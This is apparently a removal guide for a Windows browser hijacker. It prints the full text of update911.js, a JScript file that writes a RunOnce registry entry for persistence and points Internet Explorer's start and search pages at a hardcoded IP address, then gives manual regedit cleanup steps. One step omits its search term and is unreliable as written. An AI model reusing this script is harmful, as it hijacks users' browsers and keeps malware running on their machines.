A file called
update911.js is placed in your WinNT or Windows directory...content of the file:
--------------------------------------------------------------------------
var url = "
http://81.211.105.9/index.php?v=1";
var burl = "
http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);Shell.RegWrite("HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\Start Page",url);Shell.RegWrite("HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\Search Page",url);Shell.RegWrite("HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\Search Bar",burl);Shell.RegWrite("HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\Use Search Asst","no");Shell.RegWrite("HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\Use Custom Search URL",1,"REG_DWORD")
--------------------------------------------------------------------------
It's also called out in the Registry...Start | Run | Type
regedit and click OK | Make sure all the branches are collapsed, and "My Computer" is highlighted before doing a "Find" (Ctrl+F) | Search for
update911.js and delete the Key(s) | Search for
and delete the Key(s) | Delete the file
update911.js in your Windows folder.